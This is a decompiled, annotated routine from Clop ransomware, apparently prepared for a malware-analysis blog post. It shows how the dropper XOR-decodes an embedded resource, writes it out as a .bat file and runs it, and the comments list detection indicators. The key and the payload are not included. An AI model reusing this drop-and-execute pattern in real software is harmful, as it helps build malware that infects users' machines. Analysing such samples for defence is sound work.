Decompiled / reverse-engineered Clop ransomware routine that deobfuscates (XOR-decodes) the "SIXSIX1" PE resource, drops it as clearsystems-10-1.bat and executes it
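/*
 * Clop dropper stage (decompiler output, behaviour preserved verbatim).
 *
 * Reads the PE resource named "SIXSIX1" (type MAKEINTRESOURCE(0xF447)) from
 * the running module, XOR-decodes a heap copy of it with the 0x42-byte (66)
 * repeating key charArrMagicStr, writes the plaintext to
 * "<current directory>\clearsystems-10-1.bat" and launches that file with
 * ShellExecuteA("open"). Returns the ShellExecuteA result (an HINSTANCE-typed
 * status value, not a real module handle).
 *
 * The only changes to the original listing are textual repairs: the
 * HTML-entity-mangled "&currentPath" arguments and the trailing gutter
 * characters left by the page extraction. No NULL/return-value checks were
 * added; their absence is part of the sample's behaviour.
 *
 * Indicators for detection / forensics:
 *   - resource name "SIXSIX1", resource type 0xF447
 *   - XOR key length 0x42 bytes, key table charArrMagicStr (defined elsewhere)
 *   - file write: %CD%\clearsystems-10-1.bat (OPEN_ALWAYS, so an existing file
 *     of that name is overwritten in place rather than replaced)
 *   - process: ShellExecuteA "open" on a .bat, which is typically launched via
 *     cmd.exe as a child of the ransomware process
 */
HINSTANCE LoadExecuteClearSystemsBatchFile()
{
  HMODULE hModule; // eax
  HMODULE phModule; // ebx
  HRSRC hRsrcSIXSIX1; // eax
  HRSRC phRsrcSIXSIX1; // esi
  HGLOBAL hGlobalRsrcSIXSIX1; // eax
  const void *ResourceLock; // edi
  DWORD cbResourceSIXSIX1; // esi
  HGLOBAL hDecryptedResourceMemory; // ebx
  DWORD pcbResourceSIXSIX1; // edi
  DWORD i; // esi
  HANDLE hDecryptedFile; // esi
  DWORD NumberOfBytesWritten; // [esp+Ch] [ebp-214h]
  DWORD nNumberOfBytesToWrite; // [esp+10h] [ebp-210h]
  /*
   * The decompiler shows a single CHAR for each of the two path buffers, but
   * the stack offsets (ebp-20Ch and ebp-108h, 0x104 = 260 bytes apart) and
   * the 260u passed to GetCurrentDirectoryA show both are MAX_PATH buffers.
   */
  CHAR currentPath; // [esp+14h] [ebp-20Ch]
  CHAR FileName; // [esp+118h] [ebp-108h]

  /* Locate the encrypted payload embedded in this executable's own resources. */
  hModule = GetModuleHandleW(0);
  phModule = hModule;
  hRsrcSIXSIX1 = FindResourceW(hModule, (LPCWSTR)0xF447, L"SIXSIX1");
  phRsrcSIXSIX1 = hRsrcSIXSIX1;
  hGlobalRsrcSIXSIX1 = LoadResource(phModule, hRsrcSIXSIX1);
  ResourceLock = LockResource(hGlobalRsrcSIXSIX1);
  cbResourceSIXSIX1 = SizeofResource(phModule, phRsrcSIXSIX1);
  nNumberOfBytesToWrite = cbResourceSIXSIX1;

  /*
   * Decode into a zeroed heap copy so the mapped resource stays untouched.
   * None of FindResource/LoadResource/LockResource/GlobalAlloc are checked;
   * a missing resource makes memmove fault on a NULL source.
   */
  hDecryptedResourceMemory = GlobalAlloc(GMEM_ZEROINIT, cbResourceSIXSIX1);
  memmove(hDecryptedResourceMemory, ResourceLock, cbResourceSIXSIX1);
  pcbResourceSIXSIX1 = cbResourceSIXSIX1;
  /* Repeating-key XOR: byte i is XORed with key byte (i mod 66). */
  for ( i = 0; i < pcbResourceSIXSIX1; ++i )
    *((_BYTE *)hDecryptedResourceMemory + i) ^= charArrMagicStr[i % 0x42];

  /*
   * Build "<cwd>\clearsystems-10-1.bat". wsprintfA is unbounded: a current
   * directory close to 260 characters plus the 23-character suffix overruns
   * the 260-byte FileName buffer on the dropper's own stack.
   */
  GetCurrentDirectoryA(260u, &currentPath);
  wsprintfA(&FileName, "%s\\clearsystems-10-1.bat", &currentPath);

  /*
   * CreateFileA flags: 0x40000000 = GENERIC_WRITE, 2 = FILE_SHARE_WRITE,
   * 4 = OPEN_ALWAYS, 0x80 = FILE_ATTRIBUTE_NORMAL. -1 is INVALID_HANDLE_VALUE.
   */
  NumberOfBytesWritten = 0;
  hDecryptedFile = CreateFileA(&FileName, 0x40000000u, 2u, 0, 4u, 0x80u, 0);
  if ( hDecryptedFile != (HANDLE)-1 )
  {
    /* WriteFile's result and the byte count are never inspected. */
    WriteFile(hDecryptedFile, hDecryptedResourceMemory, pcbResourceSIXSIX1, &NumberOfBytesWritten, 0);
    CloseHandle(hDecryptedFile);
  }
  GlobalFree(hDecryptedResourceMemory);

  /*
   * Executed unconditionally: if CreateFileA failed, whatever file already
   * sits at that path is launched instead of the freshly dropped payload.
   */
  return ShellExecuteA(0, "open", &FileName, 0, 0, 0);
}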
For blog post: https://laserkittens.com/ransomware-sucks/